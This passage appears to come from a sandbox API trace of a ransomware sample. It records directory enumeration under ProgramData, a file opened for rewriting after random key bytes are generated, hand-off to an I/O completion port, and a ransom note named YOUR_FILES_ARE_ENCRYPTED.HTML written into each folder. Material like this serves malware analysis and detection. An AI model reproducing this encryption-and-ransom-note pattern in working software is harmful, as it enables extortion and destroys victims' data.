lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\*" [0157.385] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x5cdb59dc, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5cdb59dc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0157.387] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | 
out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-215552.log") returned 79 [0157.387] lstrcmpW (lpString1="MPLog-07132009-215552.log", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.387] PathFindExtensionW (pszPath="MPLog-07132009-215552.log") returned=".log" [0157.387] lstrlenW (lpString=".log") returned 4 [0157.387] PathFindExtensionW (pszPath="MPLog-07132009-215552.log") returned=".log" [0157.387] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0157.387] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-215552.log" (normalized: "c:\\programdata\\microsoft\\windows defender\\support\\mplog-07132009-215552.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0157.388] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=6114) returned 1 [0157.388] GetProcessHeap () returned 0x270000 [0157.388] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73f0050 [0157.389] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="B1") returned 2 [0157.389] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="31") returned 2 [0157.389] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="BA") returned 2 [0157.389] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="23") returned 2 [0157.389] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="15") returned 2 [0157.389] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="EE") returned 2 [0157.389] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="11") returned 2 [0157.389] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="94") returned 2 [0157.389] wsprintfW (in: param_1=0x4ebda56, 
param_2="%02X" | out: param_1="E5") returned 2 [0157.389] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="8B") returned 2 [0157.389] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="12") returned 2 [0157.389] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="3E") returned 2 [0157.389] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="2C") returned 2 [0157.389] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="AB") returned 2 [0157.390] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="FC") returned 2 [0157.390] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="51") returned 2 [0157.390] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="D9") returned 2 [0157.390] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="13") returned 2 [0157.390] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="35") returned 2 [0157.390] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="41") returned 2 [0157.390] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="40") returned 2 [0157.390] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="36") returned 2 [0157.390] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="28") returned 2 [0157.390] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="86") returned 2 [0157.390] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="F5") returned 2 [0157.390] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="81") returned 2 [0157.390] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="C1") returned 2 [0157.390] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="CF") returned 2 [0157.390] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="30") returned 2 [0157.390] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="FE") returned 2 [0157.390] wsprintfW 
(in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="5F") returned 2 [0157.390] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="23") returned 2 [0157.391] lstrcpyW (in: lpString1=0x7400104, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-215552.log" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-215552.log") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-215552.log" [0157.391] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x73f0050, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0157.391] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73f0050, lpOverlapped=0x73f0050) returned 1 [0157.391] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0157.392] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 83 [0157.392] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\support\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0157.393] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0157.395] CloseHandle (hObject=0x5a0) returned 1 [0157.396] GetProcessHeap () returned 0x270000 [0157.397] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0157.397] FindNextFileW (in: hFindFile=0x42f3140, 
lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x5cdb59dc, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5cdb59dc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Support", cAlternateFileName="")) returned 0 [0157.397] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0157.397] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 75 [0157.397] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0157.397] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0157.400] CloseHandle (hObject=0x598) returned 1 [0157.400] GetProcessHeap () returned 0x270000 [0157.402] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0157.413] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 
dwReserved1=0x60, cFileName="Windows NT", cAlternateFileName="WINDOW~2")) returned 1 [0157.413] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT") returned 39 [0157.413] GetProcessHeap () returned 0x270000 [0157.413] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0157.413] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT" [0157.414] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\*" [0157.414] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0157.419] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.419] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: 
lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x917f121e, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="MSFax", cAlternateFileName="")) returned 1 [0157.419] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax") returned 45 [0157.419] GetProcessHeap () returned 0x270000 [0157.419] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0157.419] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax" [0157.419] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\*" [0157.419] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x917f121e, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0157.421] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, 
ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x917f121e, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.421] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ActivityLog", cAlternateFileName="ACTIVI~1")) returned 1 [0157.421] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog") returned 57 [0157.421] GetProcessHeap () returned 0x270000 [0157.421] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0157.421] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog" [0157.421] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\*" [0157.421] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, 
ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0157.422] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.422] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0157.422] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0157.422] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 87 [0157.422] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\activitylog\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 
dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0157.423] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0157.425] CloseHandle (hObject=0x5a0) returned 1 [0157.426] GetProcessHeap () returned 0x270000 [0157.427] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0157.427] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x91817478, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x91817478, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Common Coverpages", cAlternateFileName="COMMON~1")) returned 1 [0157.427] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages") returned 63 [0157.427] GetProcessHeap () returned 0x270000 [0157.427] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0157.427] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages" [0157.427] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*" [0157.427] FindFirstFileW (in: 
lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x91817478, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x91817478, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0157.427] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x91817478, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x91817478, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.428] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x91817478, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x946e16dc, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x91817478, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="en-US", cAlternateFileName="")) returned 1 [0157.428] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US") returned 69 [0157.428] GetProcessHeap () returned 0x270000 [0157.428] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7400058 [0157.428] lstrcpyW (in: lpString1=0x7400058, 
lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US" [0157.428] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\*" [0157.428] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x91817478, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x946e16dc, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x91817478, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0157.428] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x91817478, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x946e16dc, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x91817478, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.428] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8958e880, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x8994834a, 
ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x8958e880, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x28aa, dwReserved0=0x0, dwReserved1=0x60, cFileName="confident.cov", cAlternateFileName="")) returned 1 [0157.428] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\confident.cov") returned 83 [0157.428] lstrcmpW (lpString1="confident.cov", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.428] PathFindExtensionW (pszPath="confident.cov") returned=".cov" [0157.428] lstrlenW (lpString=".cov") returned 4 [0157.428] PathFindExtensionW (pszPath="confident.cov") returned=".cov" [0157.429] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8958e880, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x8994834a, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x8958e880, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x2a09, dwReserved0=0x0, dwReserved1=0x60, cFileName="fyi.cov", cAlternateFileName="")) returned 1 [0157.429] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\fyi.cov") returned 77 [0157.429] lstrcmpW (lpString1="fyi.cov", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.429] PathFindExtensionW (pszPath="fyi.cov") returned=".cov" [0157.429] lstrlenW (lpString=".cov") returned 4 [0157.429] PathFindExtensionW (pszPath="fyi.cov") returned=".cov" [0157.429] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8958e880, ftCreationTime.dwHighDateTime=0x1cbf8b7, 
